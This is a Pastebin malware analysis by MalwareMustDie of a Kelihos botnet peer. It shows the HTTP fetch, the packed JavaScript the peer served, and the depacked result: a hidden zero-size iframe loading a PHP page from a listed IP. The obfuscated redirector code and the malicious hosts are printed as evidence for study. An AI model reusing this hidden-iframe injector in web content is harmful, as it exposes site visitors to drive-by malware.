Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ################################################
- #
- # Accessing specific htm redirector in kelihos peer
- # This demonstrated only one Kelihos peer redir traffic
- # MalwareMustDie!
- #
- ################################################
- ---connection---
- 2015-10-17 00:35:56 http://151.0.21.237/index5.html
- Connecting to 151.0.21.237:80... connected.
- ---request begin---
- GET /index5.html HTTP/1.1
- User-Agent: booboo
- Accept: */*
- Accept-Encoding: identity
- Host: 151.0.21.237
- Connection: Keep-Alive
- HTTP request sent, awaiting response...
- ---response begin---
- HTTP/1.1 200
- Server: Apache
- Content-Length: 587
- Content-Type:
- Last-Modified: ?? 16 Ⅷ?2015 15:35:55 GMT
- Accept-Ranges: bytes
- Server:nginx/1.2.6
- Date:Fri, 16 Oct 2015 15:35:57 GMT
- Last-Modified:Fri, 16 Oct 2015 15:35:20 GMT
- ETag:"56211938-24b"
- Accept-Ranges:bytes
- ---response end---
- Saving to: '/test'
- /test 100%[===============>] 587 1.30KB/s in 0.4s
- Last-modified header invalid -- time-stamp ignored.
- 2015-10-17 00:35:58 (1.30 KB/s) - '/test' saved [587/587]
- ################################################
- #
- # An online packer packed Javascript...
- #
- ################################################
- // curl
- $ curl http://151.0.21.237/index5.html
- <script>eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" j=\\"0\\" f=\\"c://d.h.n.l/o.m\\">";1 5="<8";1 7="p";1 4="e";1 b="</8";1 a="e>";2.3(5);9(2.3(7+4+k+b),6);9(2.3(4+a),6);',26,26,'|var|document|write|k02|k0|1000|k01|if|setTimeout|k22|k2|http|176||src|height|117|width|board||21|php|76|tag1|ram'.split('|'),0,{}))</script>
- // beautified
- eval(function(p,a,c,k,e,d)
- {
- e=function(c)
- {
- return c.toString(36)
- };
- if(!''.replace(/^/,String))
- {
- while(c--)
- {
- d[c.toString(a)]=k[c]||c.toString(a)
- }
- k=[function(e)
- {
- return d[e]
- }
- ];
- e=function()
- {
- return'\\w+'
- };
- c=1
- };
- while(c--)
- {
- if(k[c])
- {
- p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])
- }
- }
- return p
- }
- ('1 k=" i=\\"0\\" g=\\"0\\" j=\\"0\\" f=\\"c://d.h.n.l/o.m\\">";1 5="<8";1 7="p";1 4="e";1 b="</8";1 a="e>";2.3(5);9(2.3(7+4+k+b),6);9(2.3(4+a),6);',26,26,'|var|document|write|k02|k0|1000|k01|if|setTimeout|k22|k2|http|176||src|height|117|width|board||21|php|76|tag1|ram'.split('|'),0,
- {
- }
- ))
- ################################################
- #
- # depacked the script....
- #
- ################################################
- var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://176.117.76.21/tag1.php\">";
- var k0="<if";
- var k01="ram";
- var k02="e";
- var k2="</if";
- var k22="e>";
- document.write(k0);
- setTimeout(document.write(k01+k02+k+k2),1000);
- setTimeout(document.write(k02+k22),1000);
- ################################################
- #
- # redirector result....
- #
- ################################################
- <iframe width="0" height="0" board="0" src="http://176.117.76.21/tag1.php"></iframe>
- ################################################
- #
- # Where does it go?
- #
- ################################################
- HTTP/1.1 200
- Server: Apache
- Content-Length: 54
- Content-Type:
- Last-Modified: ?? 16 Ⅷ?2015 15:54:40 GMT
- Accept-Ranges: bytes
- Server:nginx/1.2.6
- Date:Fri, 16 Oct 2015 15:54:44 GMT
- X-Powered-By:PHP/5.4.11
- ---response end---
- Saving to: 'tag1.php'
- tag1.php 100%[===============>] 54 122 B/s in 0.4s
- 2015-10-17 00:54:45 (122 B/s) - 'tag1.php' saved [54/54]
- $ date
- Sat Oct 17 00:56:53 JST 2015
- $ cat tag1.php
- <!DOCTYPE HTML><html><head></head><body>xxxxxxxxxxxxxxx</body></html>
- #MalwareMustDie! Analyzed by @unixfreaxjp
- [EOF]
Add Comment
Please, Sign In to add comment